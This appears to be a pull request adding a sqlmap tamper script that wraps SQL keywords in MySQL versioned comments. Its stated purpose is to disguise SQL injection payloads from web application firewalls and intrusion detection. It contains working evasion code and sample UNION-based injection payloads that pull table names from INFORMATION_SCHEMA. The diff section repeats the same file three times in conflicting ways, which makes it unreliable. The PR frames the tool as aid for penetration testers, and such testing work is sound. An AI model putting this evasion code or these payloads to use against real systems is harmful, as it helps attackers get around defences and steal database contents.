### PR TITLE
Add new tamper script 'mysqlversioncomment.py'

### DIFF
--- a/tamper/mysqlversioncomment.py
+++ b/tamper/mysqlversioncomment.py
@@ -12,6 +12,9 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.NORMAL
 
 def dependencies():
+    """
+    This tamper script does not have any dependencies.
+    """
     pass
 
 def tamper(payload, **kwargs):
@@ -33,7 +36,9 @@ def tamper(payload, **kwargs):
     >>> tamper("1 AND 1=1 UNION ALL SELECT 1,GROUP_CONCAT(table_name),3 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()")
     '1 AND 1=1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ 1,/*!50000GROUP_CONCAT*/(/*!50000table_name*/),3 /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/=/*!50000database()*/'
     """
+
     keywords = {
+        # DML & DDL
         "SELECT": "/*!50000SELECT*/",
         "UNION": "/*!50000UNION*/",
         "INSERT": "/*!50000INSERT*/",
@@ -46,11 +51,15 @@ def tamper(payload, **kwargs):
         "LIMIT": "/*!50000LIMIT*/",
         "ALL": "/*!50000ALL*/",
         "DISTINCT": "/*!50000DISTINCT*/",
+
+        # Information Schema
         "INFORMATION_SCHEMA.TABLES": "/*!50000INFORMATION_SCHEMA.TABLES*/",
         "INFORMATION_SCHEMA.COLUMNS": "/*!50000INFORMATION_SCHEMA.COLUMNS*/",
         "TABLE_NAME": "/*!50000TABLE_NAME*/",
         "COLUMN_NAME": "/*!50000COLUMN_NAME*/",
         "TABLE_SCHEMA": "/*!50000TABLE_SCHEMA*/",
+
+        # Functions
         "CONCAT": "/*!50000CONCAT*/",
         "CONCAT_WS": "/*!50000CONCAT_WS*/",
         "GROUP_CONCAT": "/*!50000GROUP_CONCAT*/",
@@ -62,6 +71,8 @@ def tamper(payload, **kwargs):
         "ORD": "/*!50000ORD*/",
         "BENCHMARK": "/*!50000BENCHMARK*/",
         "SLEEP": "/*!50000SLEEP*/",
+
+        # System Information Functions
         "DATABASE()": "/*!50000DATABASE()*/",
         "USER()": "/*!50000USER()*/",
         "SESSION_USER()": "/*!50000SESSION_USER()*/",
@@ -69,6 +80,8 @@ def tamper(payload, **kwargs):
         "VERSION()": "/*!50000VERSION()*/",
         "@@VERSION": "/*!50000@@VERSION*/",
         "@@HOSTNAME": "/*!50000@@HOSTNAME*/",
+
+        # Other keywords
         "SEPARATOR": "/*!50000SEPARATOR*/",
         "HAVING": "/*!50000HAVING*/",
         "INTO": "/*!50000INTO*/",
@@ -80,13 +93,7 @@ def tamper(payload, **kwargs):
     ret_val = payload
 
     if payload:
-        sorted_keywords = sorted(keywords.keys(), key=len, reverse=True)
-
-        for keyword in sorted_keywords:
-            if "()" in keyword:
-                regex_keyword = re.escape(keyword)
-                ret_val = re.sub(r"(?i)\b%s\b" % regex_keyword, keywords[keyword], ret_val)
-            else:
-                ret_val = re.sub(r"(?i)\b%s\b" % re.escape(keyword), keywords[keyword], ret_val)
+        for keyword in keywords:
+            ret_val = re.sub(r"(?i)(?<!\w)%s(?!\w)" % re.escape(keyword), keywords[keyword], ret_val)
 
     return ret_val

--- a/tamper/mysqlversioncomment.py
+++ b/tamper/mysqlversioncomment.py
@@ -12,9 +12,6 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.NORMAL
 
 def dependencies():
-    """
-    This tamper script does not have any dependencies.
-    """
     pass
 
 def tamper(payload, **kwargs):
@@ -36,12 +33,7 @@ def tamper(payload, **kwargs):
     >>> tamper("1 AND 1=1 UNION ALL SELECT 1,GROUP_CONCAT(table_name),3 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()")
     '1 AND 1=1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ 1,/*!50000GROUP_CONCAT*/(/*!50000table_name*/),3 /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/=/*!50000database()*/'
     """
-
-    # A comprehensive list of keywords and functions to be commented
-    # Using a dictionary to allow for specific replacements if needed,
-    # though here we use a generic replacement pattern.
     keywords = {
-        # DML & DDL
         "SELECT": "/*!50000SELECT*/",
         "UNION": "/*!50000UNION*/",
         "INSERT": "/*!50000INSERT*/",
@@ -54,15 +46,11 @@ def tamper(payload, **kwargs):
         "LIMIT": "/*!50000LIMIT*/",
         "ALL": "/*!50000ALL*/",
         "DISTINCT": "/*!50000DISTINCT*/",
-
-        # Information Schema
         "INFORMATION_SCHEMA.TABLES": "/*!50000INFORMATION_SCHEMA.TABLES*/",
         "INFORMATION_SCHEMA.COLUMNS": "/*!50000INFORMATION_SCHEMA.COLUMNS*/",
         "TABLE_NAME": "/*!50000TABLE_NAME*/",
         "COLUMN_NAME": "/*!50000COLUMN_NAME*/",
         "TABLE_SCHEMA": "/*!50000TABLE_SCHEMA*/",
-
-        # Functions
         "CONCAT": "/*!50000CONCAT*/",
         "CONCAT_WS": "/*!50000CONCAT_WS*/",
         "GROUP_CONCAT": "/*!50000GROUP_CONCAT*/",
@@ -74,8 +62,6 @@ def tamper(payload, **kwargs):
         "ORD": "/*!50000ORD*/",
         "BENCHMARK": "/*!50000BENCHMARK*/",
         "SLEEP": "/*!50000SLEEP*/",
-
-        # System Information Functions
         "DATABASE()": "/*!50000DATABASE()*/",
         "USER()": "/*!50000USER()*/",
         "SESSION_USER()": "/*!50000SESSION_USER()*/",
@@ -83,8 +69,6 @@ def tamper(payload, **kwargs):
         "VERSION()": "/*!50000VERSION()*/",
         "@@VERSION": "/*!50000@@VERSION*/",
         "@@HOSTNAME": "/*!50000@@HOSTNAME*/",
-
-        # Other keywords
         "SEPARATOR": "/*!50000SEPARATOR*/",
         "HAVING": "/*!50000HAVING*/",
         "INTO": "/*!50000INTO*/",
@@ -96,21 +80,13 @@ def tamper(payload, **kwargs):
     ret_val = payload
 
     if payload:
-        # Sort keywords by length, descending, to replace longer matches first (e.g., 'GROUP BY' before 'BY')
-        # This prevents partial replacements.
         sorted_keywords = sorted(keywords.keys(), key=len, reverse=True)
 
         for keyword in sorted_keywords:
-            # Use a regular expression with word boundaries (\b) to avoid replacing
-            # keywords that are part of other words (e.g., 'IN' in 'INFORMATION_SCHEMA').
-            # We handle functions with parentheses separately to avoid issues with word boundaries.
             if "()" in keyword:
-                # For functions, we need to escape the parentheses for regex
                 regex_keyword = re.escape(keyword)
                 ret_val = re.sub(r"(?i)\b%s\b" % regex_keyword, keywords[keyword], ret_val)
             else:
-                # For other keywords, use word boundaries
                 ret_val = re.sub(r"(?i)\b%s\b" % re.escape(keyword), keywords[keyword], ret_val)
 
     return ret_val
-

--- a/tamper/mysqlversioncomment.py
+++ b/tamper/mysqlversioncomment.py
@@ -1,0 +1,116 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import re
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    """
+    This tamper script does not have any dependencies.
+    """
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Replaces common SQL keywords with MySQL versioned comments (e.g., 'SELECT' becomes '/*!50000SELECT*/').
+
+    This technique is useful for bypassing simple keyword-based firewalls and
+    intrusion detection systems that don't parse MySQL's versioned comment syntax.
+    The '50000' indicates that the enclosed query should only be executed by MySQL
+    versions 5.0.0 and above.
+
+    Requirement:
+        * MySQL >= 5.0.0
+
+    Notes:
+        * This tamper script is designed to be quite aggressive and will comment
+          many different keywords.
+
+    >>> tamper("1 AND 1=1 UNION ALL SELECT 1,GROUP_CONCAT(table_name),3 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()")
+    '1 AND 1=1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ 1,/*!50000GROUP_CONCAT*/(/*!50000table_name*/),3 /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/=/*!50000database()*/'
+    """
+
+    # A comprehensive list of keywords and functions to be commented
+    # Using a dictionary to allow for specific replacements if needed,
+    # though here we use a generic replacement pattern.
+    keywords = {
+        # DML & DDL
+        "SELECT": "/*!50000SELECT*/",
+        "UNION": "/*!50000UNION*/",
+        "INSERT": "/*!50000INSERT*/",
+        "UPDATE": "/*!50000UPDATE*/",
+        "DELETE": "/*!50000DELETE*/",
+        "FROM": "/*!50000FROM*/",
+        "WHERE": "/*!50000WHERE*/",
+        "GROUP BY": "/*!50000GROUP BY*/",
+        "ORDER BY": "/*!50000ORDER BY*/",
+        "LIMIT": "/*!50000LIMIT*/",
+        "ALL": "/*!50000ALL*/",
+        "DISTINCT": "/*!50000DISTINCT*/",
+
+        # Information Schema
+        "INFORMATION_SCHEMA.TABLES": "/*!50000INFORMATION_SCHEMA.TABLES*/",
+        "INFORMATION_SCHEMA.COLUMNS": "/*!50000INFORMATION_SCHEMA.COLUMNS*/",
+        "TABLE_NAME": "/*!50000TABLE_NAME*/",
+        "COLUMN_NAME": "/*!50000COLUMN_NAME*/",
+        "TABLE_SCHEMA": "/*!50000TABLE_SCHEMA*/",
+
+        # Functions
+        "CONCAT": "/*!50000CONCAT*/",
+        "CONCAT_WS": "/*!50000CONCAT_WS*/",
+        "GROUP_CONCAT": "/*!50000GROUP_CONCAT*/",
+        "COUNT": "/*!50000COUNT*/",
+        "SUBSTRING": "/*!50000SUBSTRING*/",
+        "CAST": "/*!50000CAST*/",
+        "CHAR": "/*!50000CHAR*/",
+        "ASCII": "/*!50000ASCII*/",
+        "ORD": "/*!50000ORD*/",
+        "BENCHMARK": "/*!50000BENCHMARK*/",
+        "SLEEP": "/*!50000SLEEP*/",
+
+        # System Information Functions
+        "DATABASE()": "/*!50000DATABASE()*/",
+        "USER()": "/*!50000USER()*/",
+        "SESSION_USER()": "/*!50000SESSION_USER()*/",
+        "SYSTEM_USER()": "/*!50000SYSTEM_USER()*/",
+        "VERSION()": "/*!50000VERSION()*/",
+        "@@VERSION": "/*!50000@@VERSION*/",
+        "@@HOSTNAME": "/*!50000@@HOSTNAME*/",
+
+        # Other keywords
+        "SEPARATOR": "/*!50000SEPARATOR*/",
+        "HAVING": "/*!50000HAVING*/",
+        "INTO": "/*!50000INTO*/",
+        "OUTFILE": "/*!50000OUTFILE*/",
+        "DUMPFILE": "/*!50000DUMPFILE*/",
+        "LOAD_FILE": "/*!50000LOAD_FILE*/",
+    }
+
+    ret_val = payload
+
+    if payload:
+        # Sort keywords by length, descending, to replace longer matches first (e.g., 'GROUP BY' before 'BY')
+        # This prevents partial replacements.
+        sorted_keywords = sorted(keywords.keys(), key=len, reverse=True)
+
+        for keyword in sorted_keywords:
+            # Use a regular expression with word boundaries (\b) to avoid replacing
+            # keywords that are part of other words (e.g., 'IN' in 'INFORMATION_SCHEMA').
+            # We handle functions with parentheses separately to avoid issues with word boundaries.
+            if "()" in keyword:
+                # For functions, we need to escape the parentheses for regex
+                regex_keyword = re.escape(keyword)
+                ret_val = re.sub(r"(?i)\b%s\b" % regex_keyword, keywords[keyword], ret_val)
+            else:
+                # For other keywords, use word boundaries
+                ret_val = re.sub(r"(?i)\b%s\b" % re.escape(keyword), keywords[keyword], ret_val)
+
+    return ret_val
+


### PR DESCRIPTION
### Description

This pull request introduces a new tamper script, `mysqlversioncomment.py`, designed to obfuscate SQL injection payloads targeting MySQL databases. The script wraps a comprehensive list of common SQL keywords, functions, and information schema objects within MySQL-specific versioned comments (e.g., `/*!50000KEYWORD*/`).

This obfuscation technique is effective at bypassing basic Web Application Firewalls (WAFs) and Intrusion Detection Systems (IDS) that perform simple keyword filtering without correctly parsing MySQL's versioned comment syntax.

---

### How it Works

The script iterates through a predefined list of keywords and functions. To ensure correctness, it replaces longer keywords first (e.g., `GROUP BY` before `BY`) and uses word boundaries to prevent accidental replacement of substrings within other words.

**Example of transformation:**

* **Before:**
    ```sql
    1 UNION SELECT GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = database()
    ```

* **After:**
    ```sql
    1 /*!50000UNION*/ /*!50000SELECT*/ /*!50000GROUP_CONCAT*/(/*!50000table_name*/) /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/ = /*!50000database()*/
    ```

---

This addition provides another valuable tool for penetration testers to use when faced with filtered environments.
